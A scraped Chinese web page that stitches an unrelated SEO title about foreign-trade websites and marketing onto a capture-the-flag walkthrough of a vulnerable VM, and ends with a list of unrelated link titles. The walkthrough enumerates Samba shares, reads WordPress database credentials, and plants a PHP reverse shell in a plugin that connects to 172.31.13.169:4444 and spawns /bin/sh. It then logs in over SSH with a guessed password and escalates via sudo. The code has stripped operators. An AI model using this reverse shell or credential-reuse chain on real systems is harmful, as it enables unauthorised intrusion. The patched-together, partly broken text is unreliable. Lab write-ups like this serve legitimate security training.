当前位置: 首页 > news >正文

安徽外贸网站google建站品牌营销策划与管理

安徽外贸网站google建站,品牌营销策划与管理,公司制作网站流程,定南网站建设准备工作 下载好靶机到本地后 VMware导入OVA 启动靶机 扫描信息 首先扫描整个C段发现主机 进一步扫描端口 从扫描结果可知#xff1a; Samba服务MySQLSSH端口网站端口 先对网站进行目录遍历 发现有wordpress网站和phpmyadmin管理系统 出现了非常多遍My name is togie.可能…准备工作 下载好靶机到本地后 VMware导入OVA 启动靶机 扫描信息 首先扫描整个C段发现主机 进一步扫描端口 从扫描结果可知 Samba服务MySQLSSH端口网站端口 先对网站进行目录遍历 发现有wordpress网站和phpmyadmin管理系统 出现了非常多遍My name is togie.可能是个重要信息 有phpmyadmin但不知道密码。 80端口没有更多收获转向Samba服务 列出分享目录的列表没有密码直接回车 访问 share$目录 首先去查看WP的配置文件一般里面会有连接数据库的密码 拿到数据库用户密码为Admin:TogieMYSQL12345^^ 再看看有没有别的信息 服务器密码为12345用户名未知 用刚刚拿到的密码去登phpmyadmin 成功但无法继续操作 去试试wordpress后台 地址/wordpress/wp-admin 复用之前的数据库账号密码试试 成功进入随后利用插件功能执行反弹shell 首先监听上线 编辑插件然后将我们的恶意shell粘贴进去 $sock fsockopen(172.31.13.169, 4444); //(监听端IP, 监听端口) $descriptorspec array( 0 $sock, 1 $sock, 2 $sock ); $process proc_open(/bin/sh, $descriptorspec, $pipes); proc_close($process); 提示更新成功接下来访问hello.php文件位置/wordpress/wp-content/plugins/hello.php kail这边也成功监听到上线 查看用户看到了togie账号结合到前面页面上重复多遍的My name is togie和 之前看到密码是12345的文件 猜测这是这位的账号密码刚好开着ssh账号试着登录。 成功上去查看sudo权限 已有sudo权限至此对靶机的渗透结束
http://www.w-s-a.com/news/222997/

相关文章:

  • 网站建设与推广员岗位职责网站开发应如何入账
  • 企业网站的作用和目的手机回收站
  • 大连零基础网站建设培训电话郎溪做网站
  • 成都科技网站建设注册公司最少需要多少注册资金
  • 找公司做网站注意事项麻城建设局网站停办
  • 沧州企业做网站wordpress 消息通知
  • 网站开发外包计入什么科目怎样申请网站空间
  • 西安建设局网站小孩把巴塘网站建设
  • 做网站 客户一直要求改郑州做优惠券网站的公司
  • 专门做特卖的网站是什么东北石油大学秦皇岛吧
  • 网站建设需要云主机吗wordpress 下载数据表插件
  • 集团网站建设哪个好石龙镇仿做网站
  • 网站建设费税率是多少项目备案信息查询
  • 网站开发php有哪些权威发布型舆情回应
  • 凡科建站有哪些弊端百度手机怎么刷排名多少钱
  • 南山网站公司在招聘网站做销售工资高吗
  • 百度联盟怎么加入赚钱合肥seo按天收费
  • 网站建设与用户需求分析加盟店排行榜加盟项目排行榜
  • 柳州市诚信体系建设网站wordpress建手机网站吗
  • 网站策划书是什么水产公司网站源码
  • 温州做网站多少钱网站服务器机房
  • 网站公司设计 网站首页什么网站专门做图片
  • 书店网站怎么做网站点击快速排名
  • 太阳镜商城网站建设公司做网站
  • 如何制作个人作品网站宣传片拍摄合同
  • 关于微网站策划ppt怎么做做插画的网站
  • 做设计网上揽活哪个网站最好中企动力算大厂吗
  • 电子商务网站开发常用工具牡丹江吧
  • 四川成都网站制作公司wordpress 获取某个分类的文章
  • wordpress 编辑器推动门户网站建设不断优化升级